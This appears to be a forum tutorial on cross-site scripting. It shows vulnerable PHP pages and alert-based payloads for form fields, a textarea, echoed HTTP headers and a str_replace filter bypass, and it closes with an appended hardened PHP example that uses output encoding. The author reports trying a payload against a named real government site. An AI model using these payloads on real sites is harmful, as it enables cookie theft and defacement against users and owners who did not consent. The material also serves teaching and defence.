Showing content with the highest reputation on 06/27/13 in all areas
We don't limit ourselves to finding XSS the usual way, with the typical script `<script>alert("XSS")</script>`. It is one of the most common vulnerabilities today and as dangerous as any other, because if you know how to use them you can do whatever you want.

Case 1: any vulnerability is limited only as far as you want it to be, starting with cookies all the way to a deface. You only need 2 essential things: 1) mentality 2) imagination; after that, the sky is the limit. One of the most common cases, the vulnerable code:

[CODE]
<html>
<head>
<title>Formular de cautare</title>
</head>
<body>
<center>
<?php
if (isset($_POST['text'])) {
    $XSS = $_POST['text'];
    // the submitted value is echoed back into the attribute unescaped
    echo "<form name=\"XSS\" method=\"POST\"><h1>0 rezultate</h1><br><hr><br><input type=\"text\" value=\"$XSS\" name=\"text\"><br><input type=\"submit\" value=\"Cautare\"></form>";
} else {
    echo "<form name=\"XSS\" method=\"POST\"><h1>Formular de cautare</h1><br><hr><br><input type=\"text\" value=\"\" name=\"text\"><br><input type=\"submit\" value=\"Cautare\"></form>";
}
?>
</center>
</body>
</html>
[/CODE]

As we can see in the source, if we search for something, whatever we search for stays in the form. This one is easy: we write `"><script>alert("XSS")</script>`, which logically would stay like this: `<input type="text" value="">`

Case 2: restriction to certain characters / limited text fields. Another very common case; I leave you the wonder here: http://www.gov.ro/ Nothing could be added in the form, nothing like `">$#-|/()=\*¿?[`, not a single special character. Searching for a simple word (buna), the result was this:

[CODE]resultatgeneral.jsp?cuvantul=buna&servici=0[/CODE]

so I did it the following way:

[CODE]http://url/resultatgeneral.jsp?cuvant="><script>alert(/OK/)</script>&servici=0[/CODE]

Bingo. This can be done with TAMPER DATA (a Firefox add-on), modifying the content that is sent through POST.

Case 3: Textarea

[CODE]<textarea style="width:320px; height:120px" name=message></textarea>[/CODE]

As can be seen, a simple `">` does not bypass it. If we enter a text it will look like this:

[CODE]<textarea style="width:320px; height:120px" name=message>Mensaje </textarea>[/CODE]

`</textarea><script>alert(/PWNED/)</script>` would stay like this:

[CODE]<textarea style="width:320px; height:120px" name=message> </textarea> <script>alert(/PWNED/)</script> </textarea>[/CODE]

Headers

This one is very interesting: we play with the headers to get an XSS.

1 - User Agent

Source:

[CODE]
<?php
$nav = $_SERVER['HTTP_USER_AGENT'];
echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>";
?>
[/CODE]

Header:

[CODE]
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
[/CODE]

and if we modify it:

[CODE]
Host: localhost
User-Agent: I can't remember the name :$
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
[/CODE]

And ... `User-Agent: <script>alert(/Yeah/)</script>`

2 - Referer

Header:

[CODE]
host : What IP do I have? What is my IP?
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com.do/
Cookie: ******
[/CODE]

and if we modify it:

[CODE]
host : What IP do I have? What is my IP?
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: <script>alert(/Yeah/)</script>
Cookie: ******
[/CODE]

3 - X-Forwarded-For

[CODE]
host : What IP do I have? What is my IP?
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/
X-Forwarded-For: 127.0.0.1
Cookie: ******
[/CODE]

127.0.0.1 being the IP to spoof. The output this gives us for the IP in this case would be 127.0.0.1.

[CODE]
Host: *********
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://google.com
X-Forwarded-For: <script>alert(/Yeah/)</script>
Cookie: ******
[/CODE]

It is the same as an XSS.

STR_Replace

What to do if you find a script like this for XSS:

[CODE]
<?php
if (isset($_GET['xss'])) {
    $xss = $_GET['xss'];
    // blacklist filter: strips only the literal strings "<script>" and "alert"
    $xss2 = str_replace("<script>", "", $xss);
    $xss3 = str_replace("alert", "", $xss2);
    echo "<form name=\"Hi\"><input type=\"text\" value=\"$xss3\" size=\"30\"></form>";
}
?>
[/CODE]

If we try to put `<script>alert(Yeah)</script>` it would stay as `alert(Yeah)</script>`, and because of this no alert is produced, but we try to get further. As we see in the source, searching for (aaaa) this is the result:

[CODE]<input type="text" value="aaa" size="30">[/CODE]

It seemed something as simple as `"><script>alert(WTF)</script>`, but we can't use script, so all that is left is to think. The script is completely vulnerable: the codes are printed just as they arrive, only excluding `<script>`. Here we'll use JavaScript (http://www.w3schools.com/js/js_events.asp). We use: onblur. We enter: `Onblur=alert(000)`. No alert is produced, it stays inside the form, and because of that, if we enter bufnita it would look like this:

[CODE]<input type="text" value="" bufnita size="30">[/CODE]

so the form value would be null: `" Onblur=alert(666) "`

[CODE]<input type="text" value="" " Onblur=alert(666) " size="30">[/CODE]

In this case we would add an event property to the input, causing an XSS!! Good luck...

1 point
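Every case in the post above (the search form, the textarea, the echoed User-Agent/Referer/X-Forwarded-For headers, and the str_replace blacklist) is the same defect: request data is written into HTML without output encoding. The following is an added example, not code from the post or its author; it rewrites those pages with contextual encoding and assumes PHP 7.1 or later. The helper names `e`, `render_search_form`, `render_textarea`, `render_headers` and `demo` are hypothetical.

```php
<?php
// Added example (not from the original post): the search form and header
// echo pages hardened with output encoding instead of a blacklist.

declare(strict_types=1);

// Encode a value for insertion into an HTML attribute or element body.
// ENT_QUOTES encodes both " and ' so a value cannot close value="...",
// and the explicit charset avoids encoding-dependent bypasses.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render the search form; $text is the raw request value (e.g. $_POST['text']).
function render_search_form(?string $text): string
{
    $heading = $text === null ? 'Formular de cautare' : '0 rezultate';
    return '<form name="XSS" method="POST">'
        . '<h1>' . e($heading) . '</h1><br><hr><br>'
        . '<input type="text" value="' . e((string) $text) . '" name="text"><br>'
        . '<input type="submit" value="Cautare">'
        . '</form>';
}

// Render the textarea; a closing tag in user input becomes &lt;/textarea&gt;.
function render_textarea(string $message): string
{
    return '<textarea style="width:320px; height:120px" name="message">'
        . e($message) . '</textarea>';
}

// Echo request headers the way the post's "browser:" page does, but encoded.
// X-Forwarded-For is client-controlled: treat it as display data only, and
// only accept it for IP logic when set by a reverse proxy you operate.
function render_headers(array $server): string
{
    $rows = '';
    foreach (['HTTP_USER_AGENT', 'HTTP_REFERER', 'HTTP_X_FORWARDED_FOR'] as $key) {
        $rows .= '<li>' . e($key) . ': ' . e($server[$key] ?? '') . '</li>';
    }
    return '<ul>' . $rows . '</ul>';
}

// Self-check on the command line with the payloads quoted in the post
// (constructed input; no HTTP request needed).
function demo(): void
{
    $payloads = [
        '"><script>alert("XSS")</script>',
        '" Onblur=alert(666) "',
        '</textarea><script>alert(/PWNED/)</script>',
    ];
    foreach ($payloads as $p) {
        echo render_search_form($p), PHP_EOL;
        echo render_textarea($p), PHP_EOL;
    }
    echo render_headers([
        'HTTP_USER_AGENT'      => '<script>alert(/Yeah/)</script>',
        'HTTP_REFERER'         => 'http://www.google.com/',
        'HTTP_X_FORWARDED_FOR' => '127.0.0.1',
    ]), PHP_EOL;
}

if (PHP_SAPI === 'cli') {
    demo();
} else {
    echo render_search_form($_POST['text'] ?? null);
    echo render_headers($_SERVER);
}
```

Run it with `php hardened.php` to see each payload come back as inert text: the `"` in `" Onblur=alert(666) "` is emitted as `&quot;`, so the attribute never closes and no event handler is added, and `</textarea>` is emitted as `&lt;/textarea&gt;`, so the element is not broken out of. This is why the post's str_replace approach fails: a blacklist only removes the spellings it knows, while encoding at the point of output neutralises every character that has meaning in that HTML context, regardless of the input.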